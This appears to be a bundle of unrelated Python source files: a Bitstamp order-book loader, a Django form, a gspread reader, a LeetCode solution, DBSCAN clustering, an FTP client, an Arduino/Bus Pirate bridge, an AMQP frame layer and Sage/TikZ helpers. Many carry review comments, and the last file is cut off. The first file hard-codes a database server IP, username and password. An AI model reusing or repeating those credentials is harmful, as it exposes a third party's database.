crypto_tools_dir = os.getcwd().split('/scripts/')[0] + '/scripts/'
sys.path.append(crypto_tools_dir)
from crypto_tools import *
class PopulateCryptoBitstamp(object):
    """Fetch Bitstamp order books over HTTP and insert them into crypto_test."""

    def __init__(self):
        """Open the database connection and cache the bitstamp exchange id."""
        self.port = 3306
        # SECURITY(review): database credentials are hard-coded in source;
        # move them to environment variables or a secrets store.
        self.host = "159.89.20.249"
        self.database_name = 'crypto_test'
        self.user = 'toby'
        self.password = 'R1i9p1p1l9e0$'
        self.database = DatabaseConnect(self.host, self.database_name, self.user, self.password, self.port)
        self.database.database_connect()
        self.get_bitstamp_exchange_id()

    def get_bitstamp_exchange_id(self):
        """Store the `exchange` table id for bitstamp on self.exchange_id."""
        sql_str = """SELECT id FROM crypto_test.exchange
                     WHERE name = 'bitstamp' """
        results = psql.read_sql(sql_str, con=self.database.mydb)
        self.exchange_id = results['id'].loc[0]

    def get_bitstamp_asset_pairs_lookup(self):
        """Build a name -> asset_pairs_lookup.id dict for all bitstamp pairs."""
        sql_str = """SELECT apl.name,apl.id AS asset_pairs_lookup_id
                     FROM crypto_test.asset_pairs_lookup apl
                     INNER JOIN crypto_test.exchange e ON e.id = apl.exchange_id
                     WHERE e.name = 'bitstamp'"""
        results = psql.read_sql(sql_str, con=self.database.mydb)
        asset_pairs_lookup_dict = {}
        self.asset_pairs_list = results['name'].tolist()
        self.asset_pairs_str = ','.join(self.asset_pairs_list)
        print(self.asset_pairs_str)
        # BUG FIX: `results.T.iteritems()` relies on DataFrame.iteritems, which
        # was removed in pandas 2.0; iterrows() yields the same
        # (index, row-Series) pairs directly.
        for ind, row in results.iterrows():
            name = row['name']
            asset_pairs_lookup_dict[name] = row['asset_pairs_lookup_id']
        self.asset_pairs_lookup_dict = asset_pairs_lookup_dict

    def populate_bitstamp_data(self):
        """Download each pair's order book and insert bids/asks into the DB.

        SECURITY(review): SQL is still built with %-interpolation; the values
        are numeric/ISO timestamps generated locally, but parameterized
        queries via cursor.execute(sql, params) would be safer.
        """
        self.get_bitstamp_asset_pairs_lookup()
        for bitstamp_asset_pair in self.asset_pairs_list:
            url = """https://www.bitstamp.net/api/v2/order_book/%s/""" % (bitstamp_asset_pair)
            all_response = requests.get(url)
            all_json = all_response.text
            all_json_dict = json.loads(all_json)
            timestamp = all_json_dict['timestamp']
            # bitstamp timestamp, no order time of order
            # NOTE(review): `datetime` is not imported in this module; it is
            # presumably re-exported by `from crypto_tools import *` -- confirm.
            order_time = datetime.fromtimestamp(int(timestamp)).strftime('%Y-%m-%d %H:%M:%S')
            bids = all_json_dict['bids']
            asks = all_json_dict['asks']
            asset_pairs_lookup_id = self.asset_pairs_lookup_dict[bitstamp_asset_pair]
            bid_ask_list = [[1, bids], [2, asks]]
            for order_type in bid_ask_list:
                order_type_id = order_type[0]
                x = 0
                for order in order_type[1]:
                    x = x + 1
                    price = order[0]
                    quantity = order[1]
                    # need to remove trailing zeros before and after decimal
                    new_price = '{0:g}'.format(float(price))
                    new_quantity = '{0:g}'.format(float(quantity))
                    ut = datetime.now()
                    # BUG FIX: the original inserted float(quantity), silently
                    # discarding the normalised new_quantity computed above.
                    sql_str = """INSERT IGNORE INTO crypto_test.order_book(asset_pairs_lookup_id,order_type_id,price,quantity,order_time,server_time,ut)
                                 VALUES(%s,%s,%s,%s,"%s","%s","%s")
                              """ % (
                        asset_pairs_lookup_id, order_type_id, float(new_price), float(new_quantity), order_time, order_time, ut)
                    self.database.cursor.execute(sql_str)
                    try:
                        self.database.mydb.commit()
                    except:
                        self.database.mydb.rollback()
                    # If first 5 rows of datframe we want to insert into live.
                    if x < 6:
                        ut = datetime.now()
                        ob_last_row_id = self.database.cursor.lastrowid
                        sql_str = """INSERT IGNORE INTO crypto_test.order_book_live(order_book_id,ut)
                                     VALUES(%s,"%s")
                                  """ % (ob_last_row_id, ut)
                        self.database.cursor.execute(sql_str)
                        try:
                            self.database.mydb.commit()
                        except:
                            self.database.mydb.rollback()
def main():
    """Entry point: build the populater and load the current order books."""
    populater = PopulateCryptoBitstamp()
    populater.populate_bitstamp_data()


if __name__ == "__main__":
    main()
from persian_captcha import PersianCaptchaField
from captcha.conf import settings as captcha_settings
from captcha.models import CaptchaStore, get_safe_now
from captcha.fields import CaptchaField, CaptchaTextInput
from django import forms
class ProducerRegisterForm1(forms.Form):
    """Producer registration form, step 1 (center info + credentials + captcha)."""
    center_name = forms.CharField(max_length=30)
    executive_manager = forms.CharField(max_length=30)
    # BUG FIX: forms.Textarea is a *widget*, not a field. Assigning it directly
    # made `address` a plain class attribute that Django's form machinery
    # ignored entirely (never rendered, never validated).
    address = forms.CharField(widget=forms.Textarea)
    phone_number = forms.CharField(max_length=30)
    password = forms.CharField(widget=forms.PasswordInput, max_length=30)
    # NOTE(review): password/retyped_pass equality is not validated here;
    # a clean() override in the consuming view/form is presumably expected.
    retyped_pass = forms.CharField(widget=forms.PasswordInput, max_length=30)
    email = forms.EmailField()
    website = forms.CharField()
    captcha = PersianCaptchaField()
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
# OAuth scopes: both Sheets and Drive access are needed for gspread to open
# spreadsheets by name.
scope = ["https://spreadsheets.google.com/feeds",'https://www.googleapis.com/auth/spreadsheets',"https://www.googleapis.com/auth/drive.file","https://www.googleapis.com/auth/drive"]
# NOTE(review): expects a service-account key file "client_secret.json" in the
# current working directory.
creds = ServiceAccountCredentials.from_json_keyfile_name("client_secret.json", scope)
client = gspread.authorize(creds)
# Open the first worksheet of the named spreadsheet and dump all rows as dicts.
sheet = client.open('Python test data - cleaning').sheet1
results = sheet.get_all_records()
print(results)
|
#
# @lc app=leetcode.cn id=187 lang=python3
#
# [187] 重复的DNA序列
#
# @lc code=start
class Solution:
    def findRepeatedDnaSequences(self, s: str) -> "List[str]":
        """Return every 10-letter substring that occurs more than once in s,
        in order of first repetition.

        Fixes vs. the original:
        * the `List` annotation is quoted -- the original evaluated a name
          that is never imported in this file (NameError outside LeetCode);
        * the sliding window rebuilt a Python list and re-joined it on every
          step; plain string slicing with two sets is O(n) substring scans
          without the per-step list churn.
        """
        seen = set()        # substrings encountered at least once
        repeated = set()    # substrings already reported (dedup guard)
        res = []
        # Every window of length 10: start indices 0 .. len(s)-10.
        for i in range(len(s) - 9):
            sub = s[i:i + 10]
            if sub in seen and sub not in repeated:
                repeated.add(sub)
                res.append(sub)
            seen.add(sub)
        return res
# @lc code=end
|
import argparse
import time
import pandas as pd
from sklearn.cluster import DBSCAN
from PROJECT import *
def main():
    """Parse CLI args, run DBSCAN over the CSV, and save the clustered output.

    Flags: -f input CSV (required), -s eps radius (default 100),
    -p minPts (default 200).
    """
    parser = argparse.ArgumentParser(description='DBSCAN in Python')
    parser.add_argument('-f', '--filename', help='Name of the file', required=True)
    parser.add_argument('-s', '--eps', help='Radius Threshold', required=False, type=float, default=100)
    parser.add_argument('-p', '--minPts', help='Minimum number of points', required=False, type=int, default=200)
    args = parser.parse_args()
    filename = args.filename
    eps = args.eps
    min_pts = args.minPts
    # parse_dates comes from PROJECT and converts the date_time column on read.
    df = pd.read_csv(filename, converters={'date_time': parse_dates})
    date_time = df['date_time']
    # BUG FIX: the positional `axis` argument to DataFrame.drop was deprecated
    # and removed in pandas 2.0 -- use the explicit keyword form.
    df = df.drop(columns='date_time')
    start = time.time()
    # geo_distance (from PROJECT) is used as the pairwise metric.
    db = DBSCAN(eps=eps, min_samples=min_pts, metric=geo_distance).fit(df)
    print("[DBSCAN] Finish all in {} seconds".format(time.time() - start))
    # Re-attach timestamps and cluster labels before saving.
    df['date_time'] = date_time
    df['cluster'] = db.labels_
    output_name = "/var/www/project/dbscan_result_{}_{}.csv".format(eps, min_pts)
    transform_save(df, output_name)


if __name__ == '__main__':
    main()
|
def sumofdigits(num):
    """Return the sum of the decimal digits of a non-negative integer."""
    return sum(int(digit) for digit in str(num))
# Search downward from num-1 for the first number whose digit sum exceeds
# that of num; if none is found before reaching 11, fall back to printing
# num itself.
num = int(input())
sum_of_digits = sumofdigits(num)
for i in range(num - 1, 10, -1):
    if (sumofdigits(i) > sum_of_digits):
        print(i)
        break
    else:
        if (i == 11):
            # BUG FIX: the original printed `N`, a name that does not exist
            # anywhere in this script (NameError). `num` appears to be the
            # intended fallback -- TODO confirm against the exercise statement.
            print(num)
            break
#!_*_coding:utf-8_*_
import optparse
import socket
import json
import os
class FTPClient:
    """Ftp Client: interactive JSON-over-TCP command client for the matching
    FTP server (auth, ls, cd, get, put, mkdir, rm)."""
    # Every control message is padded to exactly this many bytes so the
    # server can read fixed-size frames.
    MSG_SIZE = 1024

    def __init__(self):
        self.username = None
        self.terminal_display = None  # prompt string, set after login
        parser = optparse.OptionParser()
        parser.add_option("-s","--server",dest="server",help="ftp server ip_addr")
        parser.add_option("-P","--port",type="int",dest="port",help="ftp server port")
        parser.add_option("-u","--username",dest="username",help="username info")
        parser.add_option("-p","--password",dest="password",help="password info")
        self.option,self.args = parser.parse_args()
        self.argv_verification()
        self.make_connection()

    def argv_verification(self):
        """Check argument validity: server and port are mandatory."""
        if not self.option.server or not self.option.port:
            exit("Error: must supply server and port parameters")

    def make_connection(self):
        """Open the TCP socket connection to the FTP server."""
        self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.sock.connect((self.option.server,self.option.port))

    def get_response(self):
        """Receive one fixed-size JSON control message and decode it to a dict."""
        data = self.sock.recv(self.MSG_SIZE)
        return json.loads(data.decode('utf-8'))

    def auth(self):
        """Interactive login with up to 3 attempts; returns True on success,
        None (falsy) after three failures."""
        count = 0
        while count < 3 :
            username = input("username>>>:").strip()
            if not username:continue
            password = input("password>>>:").strip()
            self.send_msg('auth',username=username,password=password)
            response = self.get_response()
            if response.get('status_code') == 200:
                self.username = username
                self.terminal_display = "[%s]>>>:"%self.username
                return True
            else:
                print(response.get("status_msg"))
                count += 1

    def interactive(self):
        """Main REPL: after login, dispatch `cmd args...` lines to the
        matching `_cmd` method via getattr."""
        if self.auth():
            while True:
                user_input = input(self.terminal_display).strip()
                if not user_input:continue
                cmd_list = user_input.split()
                if hasattr(self,"_%s"%cmd_list[0]):
                    func = getattr(self,"_%s"%cmd_list[0])
                    func(cmd_list[1:])
                else:
                    print("-bash: %s: command not found"%cmd_list[0])

    def parameter_check(self,args,min_args=None,max_args=None,exact_args=None):
        """Arity check for command arguments; prints a message and returns
        False on mismatch, True otherwise."""
        if min_args:
            if len(args) < min_args:
                print("must provide at least %s parameters but %s received"%(min_args,len(args)))
                return False
        if max_args:
            if len(args) > max_args:
                print("need at most %s paramenters but %s received."%(max_args,len(args)))
                return False
        if exact_args:
            # NOTE(review): this message reuses the max_args wording
            # ("at most"); it presumably should say "exactly".
            if len(args) != exact_args:
                print("need at most %s paramenters but %s received." % (exact_args, len(args)))
                return False
        return True

    def send_msg(self,action_type,**kwargs):
        """Pack a control message as JSON and send it to the remote server.

        NOTE(review): the padded msg_data is never re-serialized -- the
        unpadded bytes_msg built before the zfill is what gets sent, so the
        MSG_SIZE padding has no effect on the wire. If the server does
        fixed-size reads this can desync; confirm against the server code.
        """
        msg_data = {
            "action_type":action_type,
            "fill":""
        }
        msg_data.update(kwargs)
        bytes_msg = json.dumps(msg_data).encode('utf-8')
        if self.MSG_SIZE > len(bytes_msg):
            msg_data['fill'] = msg_data['fill'].zfill(self.MSG_SIZE - len(bytes_msg))
        self.sock.send(bytes_msg)

    def _ls(self,cmd_args):
        """Run `ls` on the server's current directory and print the listing."""
        self.send_msg(action_type='ls')
        response = self.get_response()
        if response.get('status_code') == 302:
            cmd_result_size = response.get('cmd_result_size')
            received_size = 0
            cmd_result = b""
            while received_size < cmd_result_size:
                if cmd_result_size - received_size < 8192:
                    data = self.sock.recv(cmd_result_size - received_size)
                else:
                    data = self.sock.recv(8192)
                cmd_result += data
                received_size += len(data)
            else:
                # while-else: runs once the full listing has been received.
                print(cmd_result.decode('utf-8'))

    def _cd(self,cmd_args):
        """Change the server-side working directory."""
        if self.parameter_check(cmd_args, exact_args=1):
            target_dir = cmd_args[0]
            self.send_msg('cd',target_dir=target_dir)
            response = self.get_response()
            if response.get('status_code') == 350:
                self.terminal_display = "[/%s]"%response.get('current_dir')
            else:
                print(response.get('status_msg'))

    def _get(self,cmd_args):
        """download file from ftp server"""
        if self.parameter_check(cmd_args,min_args=1):
            filename = cmd_args[0]
            self.send_msg(action_type='get',filename=filename)
            response = self.get_response()
            if response.get('status_code') == 301:
                file_size = response.get('file_size')
                received_size = 0
                with open(filename,'wb') as f:
                    while received_size < file_size:
                        if file_size - received_size < 8192:
                            data = self.sock.recv(file_size - received_size)
                        else:
                            data = self.sock.recv(8192)
                        received_size += len(data)
                        f.write(data)
                    else:
                        # while-else: whole file received.
                        print("---file [%s] rece done, received size [%s]---"%(filename,file_size))
                    # NOTE(review): f.close() is redundant inside `with`.
                    f.close()
            else:
                print(response.get('status_msg'))

    def _put(self,cmd_args):
        """Upload a local file to the server, printing a simple progress bar."""
        if self.parameter_check(cmd_args, min_args=1):
            local_file = cmd_args[0]
            if os.path.isfile(local_file):
                total_size = os.path.getsize(local_file)
                self.send_msg('put',file_size=total_size,filename=local_file)
                f = open(local_file,'rb')
                uploaded_size = 0
                last_percent = 0
                for line in f:
                    self.sock.send(line)
                    uploaded_size += len(line)
                    current_percent = int(uploaded_size / total_size * 100)
                    if current_percent > last_percent:
                        print('#'*int(current_percent/2) + "{percent}".format(percent=current_percent),end="\r")
                        last_percent = current_percent
                else:
                    # for-else: the whole file streamed without break.
                    print('\n')
                    print('file upload done'.center(50,'-'))
                    f.close()

    def _mkdir(self,cmd_args):
        """Create a directory on the server."""
        if self.parameter_check(cmd_args,min_args=1):
            dir_name = cmd_args[0]
            self.send_msg(action_type='mkdir',dir_name=dir_name)
            response = self.get_response()
            if response.get('status_code') != 360:
                print(response.get('mkdir_msg'))

    def _rm(self,cmd_args):
        """Remove a file or directory on the server."""
        if self.parameter_check(cmd_args, min_args=1):
            rm_cmd = cmd_args[0]
            self.send_msg(action_type='rm',rm_cmd=rm_cmd)
            reponse = self.get_response()
            if reponse.get('status_code') != 350:
                print(reponse.get('status_msg'))
if __name__ == "__main__":
    # Construct the client (parses CLI args, connects) and start the REPL.
    client = FTPClient()
    client.interactive()
#!/usr/bin/env python
import sys
import os
import time
import ConfigParser
import serial
from buspirate import BusPirate
# Arduino-style pin level and direction constants.
HIGH = 1
LOW = 0
INPUT = 0
OUTPUT = 1
class SPIClass:
    """Arduino-style SPI facade driving a Bus Pirate-like bridge via its
    text command protocol."""
    def __init__(self, bus):
        self.bus = bus
    def begin(self):
        """Switch the bridge into SPI mode and flush the initial responses."""
        self.bus.set_mode("spi")
        # First read byte is hosed, read it up now
        self.bus.command("[r]")
        self.bus.get_response()
        self.bus.get_response()
        self.bus.get_response()
    def csn(self, val):
        """Drive chip-select: LOW asserts ("{" command), anything else
        deasserts ("}")."""
        if val == LOW:
            self.bus.command("{")
            self.bus.expect_response("CS ENABLED")
        else:
            self.bus.command("}")
            self.bus.expect_response("CS DISABLED")
    def transfer(self, byte):
        """Clock one byte out over SPI and return the byte read back,
        parsed from the bridge's "READ: 0x.." response."""
        self.bus.command(hex(byte))
        self.bus.get_response()
        read = self.bus.get_response()
        assert read.startswith("READ: ")
        return int(read[len("READ: "):], 16)
class SerialMockClass:
    """Mock of the Arduino Serial object that writes to stdout.

    Fixes vs. the original:
    * the format branch compared against `HEX`, a name defined nowhere in
      this module, so any formatted print raised NameError; hex is the only
      alternate format this mock ever supported, so any non-None format now
      prints the value as hex;
    * println ended with a bare Python 2 `print` statement, which in
      Python 3 is a no-op expression; the newline is now written explicitly
      (portable to both).
    """
    def __init__(self):
        pass
    def begin(self, baud):
        # Baud rate is meaningless for a stdout mock.
        pass
    def print_(self, data, format=None):
        """Write data to stdout; a non-None format prints integers as hex."""
        if not format:
            if type(data) != type(""):
                sys.stdout.write(str(data))
            else:
                sys.stdout.write(data)
        else:
            sys.stdout.write(hex(data))
    def println(self, data, format=None):
        """Like print_, followed by a newline."""
        self.print_(data, format)
        sys.stdout.write("\n")
class Arduino:
    """Facade that makes a BusPirate-style serial bridge look like an
    Arduino board (pins, SPI, Serial, timing helpers).

    NOTE: this module targets Python 2 (ConfigParser import, print
    statements in the original); prints below use the single-argument
    parenthesised form, valid in both 2 and 3.
    """

    def __init__(self, port=None, board=None, debug=False):
        self.board = board
        self.board_config = None
        self.port = port
        self.board_type = None
        if self.port is None:
            # Resolve a port spec from, in priority order: the named board's
            # board.cfg entry, the BUSNINJA_PORT environment variable, the
            # first section of board.cfg, or autodetection.
            if board:
                self.board_config = ConfigParser.ConfigParser()
                self.board_config.read("board.cfg")
                port_spec = self.board_config.get(board, "connection")
            elif "BUSNINJA_PORT" in os.environ:
                port_spec = os.environ["BUSNINJA_PORT"]
            elif os.path.exists("board.cfg"):
                self.board_config = ConfigParser.ConfigParser()
                self.board_config.read("board.cfg")
                self.board = self.board_config.sections()[0]
                port_spec = self.board_config.get(self.board, "connection")
                print("Warning: using first board defined in board.cfg")
            else:
                port_spec = self.detect_board()
            self.board_type, serial_dev, baud = self.parse_port_spec(port_spec)
            self.port = serial.Serial(serial_dev, baud, timeout=0.3)
        if self.board_type is None:
            self.board_type = "arduino"
        soft_uart = False
        if self.board_type == "arduino":
            self.LED = 13
        else:
            # Non-Arduino boards need the software UART and have no LED pin 13.
            soft_uart = True
            self.LED = 0
        self.bus = BusPirate(self.port, soft_uart=soft_uart, debug=debug)
        self.bus.connect()
        self.SPI = SPIClass(self.bus)
        self.Serial = SerialMockClass()

    def detect_board(self):
        """Fallback port spec used when nothing is configured."""
        return "arduino:/dev/ttyUSB0:115200"

    def parse_port_spec(self, port_spec):
        """Parse "[<device_type>:]/dev/<serial>[:<baud>]".

        Returns (board_type_or_None, port_string, baud); baud defaults 9600.

        BUG FIX: the original initialised `dev_type = None` but returned
        `board_type`, so one-part specs ("/dev/ttyX") and two-part specs
        with a numeric baud raised UnboundLocalError instead of returning a
        None board type.
        """
        arr = port_spec.split(":")
        board_type = None
        baud = 9600
        if len(arr) == 1:
            port_str = arr[0]
        elif len(arr) == 2:
            # Two parts: either "port:baud" or "type:port".
            try:
                baud = int(arr[1])
                port_str = arr[0]
            except ValueError:
                board_type = arr[0]
                port_str = arr[1]
        elif len(arr) == 3:
            board_type = arr[0]
            port_str = arr[1]
            baud = int(arr[2])
        else:
            raise ValueError("Invalid syntax for BUSNINJA_PORT: expected [<device_type>:]/dev/<serial>[:<baud>]")
        return board_type, port_str, baud

    def get_board_type(self):
        return self.board_type

    def get_board_setting(self, option):
        """Read a string option for the current board from board.cfg."""
        return self.board_config.get(self.board, option)

    def get_board_int(self, option):
        """Read an integer option for the current board from board.cfg."""
        return self.board_config.getint(self.board, option)

    def run(self, obj):
        """Run a sketch given as a setup function, a globals dict with
        'setup'/'loop', or an object with setup/loop methods. Drains the
        board on any exception before re-raising."""
        if type(obj) == type(lambda: None):
            setup = obj
            loop = None
        elif type(obj) == type({}):
            # globals dict
            setup = obj["setup"]
            loop = obj["loop"]
        else:
            # app object
            setup = obj.setup
            loop = obj.loop
        try:
            setup()
            if loop:
                while True:
                    loop()
        except:
            self.drain()
            raise

    def run_func(self, func):
        """Run func(), flushing pending serial input on any exception."""
        try:
            func()
        except:
            self.port.read(100)
            raise

    def drain(self):
        """Some boards have bugs which may cause them misbehave if some
        'cleanup' is not performed after usage, e.g. TI Launchpad's USB
        connection may hang due to output buffer overflow if it's not
        drained"""
        self.port.read(100)

    def millis(self):
        """Milliseconds since the epoch, wrapped to 32 bits like Arduino's."""
        return int(time.time() * 1000) & 0xffffffff

    def delay(self, miliseconds):
        time.sleep(float(miliseconds) / 1000)

    def pinMode(self, pin, mode):
        """Set a pin's direction; mode is INPUT (0) or OUTPUT (1)."""
        cmd = "pinmode p%d %s" % (pin, ["in", "out"][mode])
        self.bus.command(cmd)

    def digitalWrite(self, pin, val):
        # cmd = "p%s.%s=%s" % (pin / 8 + 1, pin % 8, val)
        cmd = "p%d=%d" % (pin, val)
        self.bus.command(cmd)

    def digitalRead(self, pin):
        """Read a pin; the bridge addresses pins as port.bit."""
        cmd = "p%s.%s?" % (pin / 8 + 1, pin % 8)
        self.bus.command(cmd)
        resp = self.bus.get_response()
        assert resp.startswith("READ: "), resp
        return int(resp[-1])

    def digitalPulse_us(self, pin, val, delay_us):
        """Make pulse of not less than specified microsecond duration on a pin
        (exact duration may be longer per limitations of a specific board).
        """
        cmd = "p%d=%d &:%d p%d=%d" % (pin, val, delay_us, pin, not val)
        self.bus.command(cmd)
# Module-level singleton populated by init(); None until then.
default_arduino = None
def create_proxy_func(func_name, obj):
    """Create global function named func_name which will
    call method of the same name of obj."""
    method = getattr(obj, func_name)
    # The bound method is captured in the lambda's closure.
    f = lambda *args: method(*args)
    globals()[func_name] = f
def init(*args, **kwargs):
    """Create the default Arduino board and re-export its attributes and
    methods as module globals so sketches can use them unqualified."""
    global default_arduino
    default_arduino = Arduino(*args, **kwargs)
    # Plain attributes are copied directly...
    globs = ["LED", "SPI", "Serial"]
    for g in globs:
        globals()[g] = getattr(default_arduino, g)
    # ...methods get thin proxy functions so late rebinding still works.
    methods = [
        "run", "millis", "delay", "pinMode", "digitalRead", "digitalWrite",
        "digitalPulse_us"
    ]
    for m in methods:
        create_proxy_func(m, default_arduino)
def default_board():
    """Return the module-level Arduino created by init() (None before init)."""
    global default_arduino
    return default_arduino
|
from direct.distributed.DistributedObjectAI import DistributedObjectAI
from direct.directnotify import DirectNotifyGlobal
class DistributedTunnelAI(DistributedObjectAI):
    """AI-side distributed object for a tunnel; no behaviour beyond the base yet."""
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedTunnelAI')
    def __init__(self, air):
        # air: the AI repository that owns this distributed object.
        DistributedObjectAI.__init__(self, air)
import logging
def get_logger():
    """Return a module logger writing DEBUG+ records to offers.log.

    Fixes two defects in the original:
    * the logger's own level was never set, so with the default effective
      level (WARNING) no DEBUG/INFO record ever reached the file handler;
    * a new FileHandler was appended on every call, duplicating every line
      once per call.
    """
    logger = logging.getLogger(__name__)
    logger.setLevel(logging.DEBUG)
    if not logger.handlers:  # avoid stacking duplicate handlers on repeat calls
        handler = logging.FileHandler('offers.log')
        handler.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        handler.setFormatter(formatter)
        logger.addHandler(handler)
    logger.debug("Prueba log")
    return logger
# Module-level logger instance, configured once at import time.
_logger = get_logger()
|
from functools import reduce
def f(N, A, B):
    """Print a running tally over N: +1 for each item found in A, otherwise
    -1 for each item found in B, otherwise unchanged. Returns None."""
    tally = 0
    for item in N:
        if item in A:
            tally += 1
        elif item in B:
            tally -= 1
    print(tally)
|
from utils import read_file
def count_trees(right: int, down: int, treemapfile: str):
    """Count '#' cells hit while sledding `right` over / `down` rows through
    the grid in treemapfile (rows wrap horizontally). AoC 2020 day 3."""
    rows = read_file(treemapfile)
    hits = 0
    col = 0
    # Visit every `down`-th row after the start; the original's skip-counter
    # processes exactly the rows down, 2*down, 3*down, ...
    for idx in range(down, len(rows), down):
        row = rows[idx]
        col = (col + right) % len(row)
        if row[col] == "#":
            hits += 1
    return hits
def test():
    """Validate the five required slopes against the sample map, then print
    the product of tree encounters over the same slopes for the real input."""
    assert count_trees(1, 1, "day3_testinput") == 2
    assert count_trees(3, 1, "day3_testinput") == 7
    assert count_trees(5, 1, "day3_testinput") == 3
    assert count_trees(7, 1, "day3_testinput") == 4
    assert count_trees(1, 2, "day3_testinput") == 2
    print(count_trees(1, 1, "day3_input") *
          count_trees(3, 1, "day3_input") *
          count_trees(5, 1, "day3_input") *
          count_trees(7, 1, "day3_input") *
          count_trees(1, 2, "day3_input")
          )
|
#!/usr/bin/env python
"""
pyjld.amqp.client_0_8.layers.frame
"""
__author__ = "Jean-Lou Dupont"
__email = "python (at) jldupont.com"
__fileid = "$Id$"
__all__ = ['FrameException',
'FrameLayer',
]
from pyjld.amqp.client_0_8.base import BaseException
from pyjld.amqp.client_0_8.layers.base import LayerBase
class FrameException(BaseException):
    """
    Protocol level Exception

    NOTE(review): `BaseException` here is the project's class imported from
    pyjld.amqp.client_0_8.base, which shadows the Python builtin of the
    same name.
    """
class FrameLayer(LayerBase):
    """
    Handles the frame layer: reads/writes the AMQP 0-8 protocol header
    ("AMQP" + version octets) and the per-frame type/cycle/channel/size
    fields, delegating field I/O to LayerBase._readList/_writeList.
    """
    # Instance attributes populated by _readList when parsing a header.
    _ATTRIBUTES = [ 'type', 'cycle', 'channel', 'size'
    ]
    # type attr expected/value
    # Fixed octets spell "AMQP" followed by protocol version 1.1.9.1;
    # the remaining directives bind wire fields to attributes.
    _DIRECTIVES = [ ( "octet", None, 65), #A
        ( "octet", None, 77), #M
        ( "octet", None, 81), #Q
        ( "octet", None, 80), #P
        ( "octet", None, 1),
        ( "octet", None, 1),
        ( "octet", None, 9),
        ( "octet", None, 1),
        ( "octet", "type", None),
        ( "octet", "cycle", None),
        ( "short", "channel", None),
        ( "long", "size", None),
    ]
    def readHeader(self):
        """Read and validate the frame header per _DIRECTIVES."""
        self._readList(FrameLayer._DIRECTIVES)
    def readBody(self):
        # Body handling is delegated to higher layers.
        pass
    def readFooter(self):
        """Read the single frame-end octet and verify it is 0xCE."""
        try:
            footer = self._stream.read_octet()
        # NOTE(review): bare except hides the underlying error type; a
        # narrower exception clause would aid debugging.
        except:
            self._raise("error reading footer",
                        "error_protocol_reading_footer")
        if footer != "\xce":
            self._raise("invalid footer",
                        "error_protocol_invalid_footer")
    def writeHeader(self):
        """Write the frame header per _DIRECTIVES."""
        self._writeList(FrameLayer._DIRECTIVES)
    def writeBody(self):
        # Body handling is delegated to higher layers.
        pass
    def writeFooter(self):
        """Write the 0xCE frame-end octet."""
        self._stream.write_octet("\xCE")
    def _getExceptionClass(self):
        # Used by LayerBase._raise to raise layer-specific errors.
        return FrameException
|
from string import Template
from datetime import datetime
from sage.matrix.constructor import matrix
from sage.calculus.var import var
def write_tikz_lines_to_file(lines, filename='new_results.tex', joiner='\n'):
    """Write `lines` to `filename` and return the filename.

    A string is written verbatim; any other iterable is joined with `joiner`
    (a falsy joiner writes the value as-is, matching the original contract).
    """
    effective_joiner = None if isinstance(lines, str) else joiner
    with open(filename, 'w') as out:
        out.write(effective_joiner.join(lines) if effective_joiner else lines)
    return filename
def write_tex_files(build_bash_script=None, *dictionaries):
    """Write each filename -> {'content', 'typesettable'} entry to disk.

    When build_bash_script is given, also write a bash script with one
    `lualatex <filename>` line per file; entries marked not typesettable
    are commented out with '# '.
    """
    bash_commands = []

    def instantiate_command(appender=lambda cmd: None, **kwds):
        # BUG FIX: the template had lost its "{filename}" placeholder (it
        # read "(unknown)"), so every generated command invoked lualatex
        # without a target file -- TODO confirm intended placeholder.
        command_template = "{comment_hash}{typeset_command} {filename}{redirection}"
        # observe that `kwds' argument needs to be unpacked in the call to
        # `format', otherwise `kwds', which is a dictionary, is interpreted as
        # a positional argument, while we care about pairs in it.
        cmd = command_template.format(**kwds)
        appender(cmd)
        return cmd

    for dictionary in dictionaries:
        for filename, content_dict in dictionary.items():
            content = content_dict['content']
            write_tikz_lines_to_file(content, filename)
            if build_bash_script:
                instantiate_command(
                    appender=bash_commands.append,
                    comment_hash='# ' if not content_dict['typesettable'] else '',
                    typeset_command='lualatex',
                    filename=filename,
                    redirection='')
    # Guard: without a script path there is nothing (and nowhere) to write.
    if build_bash_script:
        write_tikz_lines_to_file(bash_commands, build_bash_script)
def substitute_from_filename(template_filename, **substitutions):
    """Read template_filename as a string.Template and safe-substitute the
    given keyword mappings (unknown placeholders are left untouched)."""
    with open(template_filename) as handle:
        template = Template(handle.read())
    return template.safe_substitute(substitutions)
def timed_execution(block):
    """Run block() and return (result, wall-clock duration as a timedelta)."""
    started = datetime.now()
    outcome = block()
    return outcome, datetime.now() - started
class AbstractNegativesChoice:
    """Interface for negatives-handling strategies (double-dispatch visitors).

    NOTE(review): concrete subclasses accept extra *args in dispatch_on;
    this base signature does not -- confirm it is never called directly.
    """
    def dispatch_on(self, recipient): pass
class IgnoreNegativesChoice:
    """Strategy: ignore negative entries; dispatches to the recipient's
    dispatched_from_IgnoreNegativesChoice handler."""
    def dispatch_on(self, recipient, *args):
        return recipient.dispatched_from_IgnoreNegativesChoice(self, *args)
class HandleNegativesChoice:
    """Strategy: handle negative entries specially; dispatches to the
    recipient's dispatched_from_HandleNegativesChoice handler."""
    def dispatch_on(self, recipient, *args):
        return recipient.dispatched_from_HandleNegativesChoice(self, *args)
class NumberedColoursTable:
    """Maps witnesses to colour-name strings, double-dispatched through a
    negatives-handling choice object."""

    def colour_of(self, negatives_handling_choice, element):
        """Let the choice object pick the matching handler below."""
        return negatives_handling_choice.dispatch_on(self, element)

    def dispatched_from_IgnoreNegativesChoice(self, choice, witness):
        # Negatives ignored: the witness itself names the colour.
        return str(witness)

    def dispatched_from_HandleNegativesChoice(self, choice, witness):
        # witness is a (sign, class) pair; negatives get a marker suffix.
        sign, witness_class = witness
        suffix = '-for-negatives' if sign < 0 else ''
        return str(witness_class) + suffix
class ForFilename:
    """Context tag: render for use in a filename; dispatches to the
    recipient's dispatched_from_ForFilename handler."""
    def dispatch_on(self, recipient, *args):
        return recipient.dispatched_from_ForFilename(self, *args)
class ForSummary:
    """Context tag: render for use in a summary; dispatches to the
    recipient's dispatched_from_ForSummary handler."""
    def dispatch_on(self, recipient, *args):
        return recipient.dispatched_from_ForSummary(self, *args)
def make_square_matrix_from_functions(n, d, h, y=var('y')):
    """Build the n x n matrix whose column j holds the series coefficients
    of d(y)*h(y)^j (column 0 is d(y) itself), truncated at order n.

